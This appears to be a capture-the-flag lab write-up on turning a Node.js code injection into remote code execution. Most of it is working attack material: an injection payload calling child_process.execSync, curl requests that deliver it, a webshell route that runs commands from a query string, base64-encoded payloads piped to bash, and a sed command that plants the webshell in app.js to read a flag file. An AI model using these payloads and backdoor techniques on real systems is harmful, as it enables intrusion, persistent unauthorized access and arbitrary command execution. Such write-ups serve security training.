Command Execution

Overview

With code injection confirmed, maximize exploitation by achieving Remote Code Execution (RCE).

---

Current Progress

#	Step	Status
1-7	Previous steps	✅
8	Reach command execution or file writing	⏳
9	Blindly verify command execution/file writing	⏳
10	Automate exploitation (write exploit)	⏳

---

Node.js Command Execution

Basic One-liner

require("child_process").execSync("touch pwned");

Integrate into Payload

{
  "text": "'}) + require('child_process').execSync('touch pwned')//"
}

Test Locally

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <ADMIN_TOKEN>" \
  -d "{ \"text\": \"'}) + require('child_process').execSync('touch pwned')//\" }" \
  http://localhost:5000/api/service/generate

# Check if file was created
ls -la pwned

Result: File created! ✅ Command execution achieved!

Note: If require doesn't work (e.g., "type": "module" in package.json), find alternative or use already imported packages.

---

Obtaining Command Output

Challenge

Code output only visible in backend console - need remote access to output.

Options Analysis

Method	Feasibility
Console log	❌ Local only
Reverse shell	❌ Outbound blocked
HTTP exfiltration	❌ No internet
DNS exfiltration	❌ No internet
Database storage	❌ No database
File write + read	⚠️ Possible
HTTP response injection	⚠️ Possible
Boolean/timing	⚠️ Last resort

---

Method 1: Console Logging (Local Only)

console.log(require("child_process").execSync("ls").toString());

Payload:

{ "text": "'}) + console.log(require('child_process').execSync('ls').toString())//" }

Output (in debug console):

app.js
package.json
src/

✅ Works locally, ❌ not for production

---

Method 2: File Write + Read

Requirements

1. Writable directory

2. Way to read file publicly

Options for Reading

Option	Description
Public directory	Write to ./public/
File read vuln	LFI, XXE, SQLi
Overwrite function	Replace route handler
Add new route	Inject middleware into app.js

This Application

• No public directory in app.js

• No file read vulnerability found

• No database

---

Method 3: Inject Webshell into app.js

Target Code

app.get("/api/cmd", (req, res) => {
  const cmd = require("child_process").execSync(req.query.cmd).toString();
  res.send(cmd);
});

Challenge

Must place route before 404 middleware, otherwise treated as 404.

---

Exploitation Steps

Step 1: Get Admin Token

curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"email": "test@hackthebox.com"}' \
  http://<TARGET>/api/auth/authenticate

Step 2: Create Webshell File

Base64 encode the webshell:

echo -n 'app.get("/api/cmd", (req, res) => {
  const cmd = require("child_process").execSync(req.query.cmd).toString();
  res.send(cmd);
});' | base64 -w0

Output:

YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs=

Write to file via command injection:

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"'})+ console.log(require('child_process').execSync('echo <BASE64> | base64 --decode > pwned.txt').toString())//\" }" \
  http://<TARGET>/api/service/generate

Step 3: Inject into app.js

Command to inject before 404 middleware:

sed -i "/app.use((req, res, next) => {/e cat pwned.txt" src/app.js

Base64 encode:

echo "sed -i \"/app.use((req, res, next) => {/e cat pwned.txt\" src/app.js" | base64 -w0

Output:

c2VkIC1pICIvYXBwLnVzZSgocmVxLCByZXMsIG5leHQpID0+IHsvZSBjYXQgcHduZWQudHh0IiBzcmMvYXBwLmpzCg==

Execute via command injection:

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"'})+ console.log(require('child_process').execSync('echo <BASE64> | base64 -d | bash').toString())//\" }" \
  http://<TARGET>/api/service/generate

Step 4: Use Webshell

curl "http://<TARGET>/api/cmd?cmd=cat+/flag.txt"

Or visit in browser:

http://<TARGET>/api/cmd?cmd=cat+/flag.txt

---

Complete Attack Chain

1. Get admin token (@hackthebox.com email)
         ↓
2. Base64 encode webshell code
         ↓
3. Write webshell to pwned.txt via command injection
         ↓
4. Base64 encode sed command
         ↓
5. Inject webshell into app.js before 404 handler
         ↓
6. Access /api/cmd?cmd=<command>
         ↓
7. Read /flag.txt

---

Why Base64 Encoding?

Problems with Direct Commands

• Quotes break JSON

• Special characters need escaping

• Complex commands hard to format

Solution

echo "<base64_payload>" | base64 -d | bash

• Avoids escaping issues

• Works with any command complexity

• Reliable execution

---

Key Takeaways

1. Code injection → RCE - Natural escalation path

2. Output exfiltration - Multiple methods, try each

3. Base64 encoding - Solves escaping problems

4. sed injection - Powerful for modifying files

5. Placement matters - Routes must be before 404 handler

6. Test environment - Auto-reload makes injection easier

---

Next Steps

• Explore HTTP response injection

• Automate with exploit script

• Test on production target